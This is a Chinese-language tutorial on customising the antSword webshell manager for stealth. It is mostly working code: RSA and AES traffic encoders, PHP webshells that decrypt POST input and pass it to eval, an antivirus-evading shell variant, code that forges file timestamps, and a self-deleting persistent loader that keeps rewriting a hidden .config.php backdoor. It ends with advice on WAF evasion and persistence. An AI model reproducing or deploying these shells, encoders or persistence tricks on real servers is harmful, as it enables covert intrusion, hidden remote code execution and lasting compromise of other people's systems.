从0到1打造一款堪称完美antSword(蚁剑)
字数 911 2025-08-25 22:58:40
从0到1打造完美蚁剑(antSword)终极指南
0x00 前言
本指南将全面介绍如何从零开始打造一款功能强大且高度隐蔽的蚁剑(antSword)工具,涵盖流量加密、免杀处理、自动化部署等高级技术。
0x01 蚁剑核心组件解析
1. 发包方式
- 常规GET/POST请求
- 表单发包(绕过WAF)
- 分块传输(不稳定但对低性能WAF有效)
2. 编码器系统
- 用于对请求包进行编码处理
- 支持多种编码方式:base64、chr、rot13等
3. 解码器系统
- 用于对返回数据包进行解码
- 支持自定义解码逻辑
4. 插件模块
- 可扩展功能如自动上传提权脚本
- 支持联动操作
0x02 环境准备
1. 下载必要资源
git clone https://github.com/AntSwordProject/AwesomeScript.git # shell脚本大全
git clone https://github.com/AntSwordProject/AwesomeEncoder.git # 编码器大全
npm install crypto-js # 安装前端加密库
2. 蚁剑目录结构
source/
├── base
├── core
│ ├── asp
│ ├── aspx
│ ├── custom
│ ├── php
│ └── php4
├── language
└── modules
├── database
├── filemanager
├── plugin
├── settings
├── shellmanager
├── terminal
└── viewsite
0x03 核心源码分析
1. 核心文件功能
index.js: 模块加载入口base.js: 配置加载和基础方法command.js: 命令执行模板处理
2. 关键功能实现
- 请求中间件处理
- 返回包解密机制
- 命令模板解析
0x04 打造全流量加密RSA Shell
1. RSA Shell优势
- 请求包RSA非对称加密防止窃取
- 返回包AES动态对称加密绕过WAF
- 随机参数防止规则匹配
- 支持multipart和分块传输
2. RSA配置生成
生成公钥/私钥对及对应的PHP shell代码
3. RSA编码器实现
module.exports = (pwd, data, ext={}) => {
let n = Math.ceil(data['_'].length / 80);
let l = Math.ceil(data['_'].length / n);
let r = []
for (var i = 0; n > i; i++) {
r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64'));
}
data[pwd] = r.join("|");
delete data['_'];
return data;
}
4. PHP Shell实现
<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC9BPAAA3EgNhVX9x5kjXwwbrA
AJSSl46CsjcloOjytsQZoR/Tn0QxI/sCaHJ23/DLviDbhZbYh3aJjXDLrGJXnQvx
BUj1a/YZDq/ZqlibffV54ljOhh6A/IIk6KmXXZBETA9GxI32vqDfqvbnuzyZMWvT
ShEmTzwYh4qW53cN+wIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
eval($cmd);
5. 增强版RSA编码器(加密所有参数)
module.exports = (pwd, data, ext={}) => {
let ret = {};
for (let _ in data) {
if (_ === '_') { continue };
ret[_] = ext['rsa'].encryptPrivate(data[_], 'base64')
}
data["_"] = `if((time()-${parseInt((new Date().getTime())/1000)})>5){die();};${data['_']}`;
let n = Math.ceil(data['_'].length / 80);
let l = Math.ceil(data['_'].length / n);
let r = []
for (var i = 0; n > i; i++) {
r.push(ext['rsa'].encryptPrivate(data['_'].substr(i * l, l), 'base64'));
}
ret[pwd] = r.join("|");
delete data['_'];
return ret;
}
0x05 无特征免杀处理技术
1. 免杀Shell实现
<?php
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC9BPAAA3EgNhVX9x5kjXwwbrA
AJSSl46CsjcloOjytsQZoR/Tn0QxI/sCaHJ23/DLviDbhZbYh3aJjXDLrGJXnQvx
BUj1a/YZDq/ZqlibffV54ljOhh6A/IIk6KmXXZBETA9GxI32vqDfqvbnuzyZMWvT
ShEmTzwYh4qW53cN+wIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", reset(get_defined_vars()[@_POST]));
$pk = openssl_pkey_get_public($pk);
$cmd = "";
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
eval($cmd);
0x06 自动化隐蔽后门实现
1. 文件时间修改代码
<?php
try {
$file = scandir($_SERVER['DOCUMENT_ROOT']);
foreach ($file as $name) {
if(@filectime($name)){
touch(__FILE__,filectime($name));
touch($name,@filectime(__FILE__));
break;
}
}
} catch (Exception $e) {
echo "config is wrong!";
}
2. 内存木马自动部署
<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
$shell = '<?php $pk = <<<EOF...'; // 完整shell代码
while(1){
if(file_exists(".config.php")){
try {
system('chmod 777 .config.php');
$file = scandir($_SERVER['DOCUMENT_ROOT']);
foreach ($file as $name) {
if(@filectime($name)){
touch(".config.php", @filectime($name));
break;
}
}
} catch (Exception $e) {
echo "config is wrong!";
}
}else{
sleep(3600*60);
file_put_contents('.config.php',$shell);
}
}
0x07 高级流量加密技术
1. AES-256-CFB动态密钥加密解码器
'use strict';
const path = require('path');
var CryptoJS = require(path.join(window.antSword.remote.process.env.AS_WORKDIR, 'node_modules/crypto-js'));
function randomRange(min, max){
var returnStr = "",
range = (max ? Math.round(Math.random() * (max-min)) + min : min),
charStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
for(var i=0; i<range; i++){
var index = Math.round(Math.random() * (charStr.length-1));
returnStr += charStr.substring(index,index+1);
}
return returnStr;
}
var key = randomRange(32,32);
function decryptText(keyStr, text) {
let buff = Buffer.alloc(32, 'a');
buff.write(keyStr,0);
keyStr = buff.toString();
let decodetext = CryptoJS.AES.decrypt(text, CryptoJS.enc.Utf8.parse(keyStr), {
iv: CryptoJS.enc.Utf8.parse(keyStr),
mode: CryptoJS.mode.CFB,
padding: CryptoJS.pad.ZeroPadding
}).toString(CryptoJS.enc.Utf8);
return decodetext;
}
module.exports = {
asoutput: () => {
return `function asenc($out){
$key=${key};
$iv=$key;
return @base64_encode(openssl_encrypt(base64_encode($out), "AES-256-CFB", $key,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING, $iv));
}`.replace(/\n\s+/g, '');
},
decode_str: (data, ext={}) => {
if(data.length === 0) return data;
let ret = decryptText(key, data);
return Buffer.from(ret, 'base64').toString();
},
decode_buff: (data, ext={}) => {
if(data.length === 0) return data;
return Buffer.from(decryptText(key, Buffer.from(data).toString()), 'base64');
}
}
0x08 最佳实践建议
- 流量加密组合:RSA请求+AES返回+随机参数+分块传输
- 隐蔽性增强:修改文件时间戳+隐藏文件名+内存驻留
- 免杀处理:无参数+非常规函数调用+代码混淆
- 自动化部署:定时检查+自动修复+环境适配
0x09 参考资源
- WAF拦截蚁剑参数处理方案
- [蚁剑绕WAF进化图鉴]
- [蚁剑动态秘钥编码器实现]
- [RSA在AWD攻防中的应用]
- [蚁剑客户端RCE分析]